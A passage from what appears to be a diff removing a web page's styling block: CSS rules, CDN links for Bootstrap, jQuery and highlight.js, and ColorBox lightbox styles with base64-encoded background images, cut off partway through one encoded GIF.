-    }
-    .md-float-right .col-sm-8, .md-float-right .col-sm-4, .md-float-right .col-sm-2 {
-        float: right !important;
-        width: auto;
-    }
-    #md-all .md-copyright-footer {
-        background-color: !important;
-        font-size: smaller;
-        padding: 1em;
-    }
-    </style>
-
-<link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css" type="text/css"></link>
-<link rel="stylesheet" href="//yandex.st/highlightjs/7.3/styles/github.min.css" type="text/css"></link>
-<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
-<script type="text/javascript" src="//netdna.bootstrapcdn.com/bootstrap/3.0.0/js/bootstrap.min.js"></script>
-<script type="text/javascript" src="//yandex.st/highlightjs/7.3/highlight.min.js"></script>
-<!-- START extlib/css/colorbox.css -->
-<style id="style:extlib/css/colorbox.css">/*
-    ColorBox Core Style:
-    The following CSS is consistent between example themes and should not be altered.
-*/
-#colorbox, #cboxOverlay, #cboxWrapper{position:absolute; top:0; left:0; z-index:9999; overflow:hidden;}
-#cboxOverlay{position:fixed; width:100%; height:100%;}
-#cboxMiddleLeft, #cboxBottomLeft{clear:left;}
-#cboxContent{position:relative;}
-#cboxLoadedContent{overflow:auto;}
-#cboxTitle{margin:0;}
-#cboxLoadingOverlay, #cboxLoadingGraphic{position:absolute; top:0; left:0; width:100%; height:100%;}
-#cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow{cursor:pointer;}
-.cboxPhoto{float:left; margin:auto; border:0; display:block; max-width:none;}
-.cboxIframe{width:100%; height:100%; display:block; border:0;}
-#colorbox, #cboxContent, #cboxLoadedContent{box-sizing:content-box;}
-
-/*
-    User Style:
-    Change the following styles to modify the appearance of ColorBox.  They are
-    ordered & tabbed in a way that represents the nesting of the generated HTML.
-*/
-#cboxOverlay{background:#000;}
-
-#colorbox{}
-
-        #cboxTitle{position:absolute; bottom:-25px; left:0; text-align:center; width:100%; font-weight:bold; color:#7C7C7C;}
-        #cboxCurrent{position:absolute; bottom:-25px; left:58px; font-weight:bold; color:#7C7C7C;}
-
-        #cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow{position:absolute; bottom:-29px; background-repeat: no-repeat; background-position: 0px 0px; width:23px; height:23px; text-indent:-9999px;}
-        #cboxPrevious{left:0px; background-position: -51px -25px;}
-        #cboxPrevious:hover{background-position:-51px 0px;}
-        #cboxNext{left:27px; background-position:-75px -25px;}
-        #cboxNext:hover{background-position:-75px 0px;}
-        #cboxClose{right:0; background-position:-100px -25px;}
-        #cboxClose:hover{background-position:-100px 0px;}
-
-        .cboxSlideshow_on #cboxSlideshow{background-position:-125px 0px; right:27px;}
-        .cboxSlideshow_on #cboxSlideshow:hover{background-position:-150px 0px;}
-        .cboxSlideshow_off #cboxSlideshow{background-position:-150px -25px; right:27px;}
-        .cboxSlideshow_off #cboxSlideshow:hover{background-position:-125px 0px;}
-
-/* begin inline customizing */
-
-    #cboxBottomCenter{height:43px; background-repeat: repeat-x; background-position: bottom left;}
-    #cboxTopCenter{height:14px; background-repeat: repeat-x; background-position: top left;}
-
-    #cboxBottomCenter, #cboxTopCenter {background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAABLCAMAAACGCB2xAAAAM1BMVEVSUlJHR0dPT09BQUFLS0tQUFA6OjpgYGCKioozMzPS0tJaWlpRUVHy8vKJiYn////m5eV3dK93AAAAK0lEQVR4XqXBhQ2AQBAAsJ48bvtPywyE1GLGYUgtlPuT0+b5abealNDScL0YiAPSV/RH9wAAAABJRU5ErkJggg==);}
-
-    #cboxTopLeft, #cboxTopRight, #cboxBottomLeft, #cboxBottomRight, #cboxMiddleLeft,
-
-    #cboxMiddleRight, #cboxContent,#cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow {
-        background-image:url(data:image/png;base64,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);
-    }
-
-    #cboxTopLeft{width:14px; height:14px; background-repeat: no-repeat; background-position: 0 0;}
-    #cboxTopRight{width:14px; height:14px; background-repeat: no-repeat; background-position: -36px 0;}
-    #cboxBottomLeft{width:14px; height:43px; background-repeat: no-repeat; background-position: 0 -32px;}
-    #cboxBottomRight{width:14px; height:43px;  background-repeat: no-repeat; background-position: -36px -32px;}
-    #cboxMiddleLeft{width:14px; background-repeat: repeat-y; background-position: -175px 0;}
-    #cboxMiddleRight{width:14px; background-repeat: repeat-y; background-position: -211px 0;}
-    #cboxContent{background:#fff; overflow:visible;}
-
-
-
-        .cboxIframe{background:#fff;}
-        #cboxError{padding:50px; border:1px solid #ccc;}
-        #cboxLoadedContent{margin-bottom:5px;}
-        #cboxLoadingOverlay{background:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoBAMAAAB+0KVeAAAAElBMVEX///////////8AAAD///////9H1zSfAAAABXRSTlPvgBAAz5JLnNUAAAA+SURBVHhe7dMhAQAgEEPRIfAYEkCCi0ACEOtfBc8WAHFfPr0hGp/KwKS00BUPquIGTZ9gYqIdrZ23PYK9zAX6sAYavSqAMgAAAABJRU5ErkJggg==);
-         background-repeat: no-repeat; background-position: center center;}
-        #cboxLoadingGraphic{background: url(data:image/gif;base64,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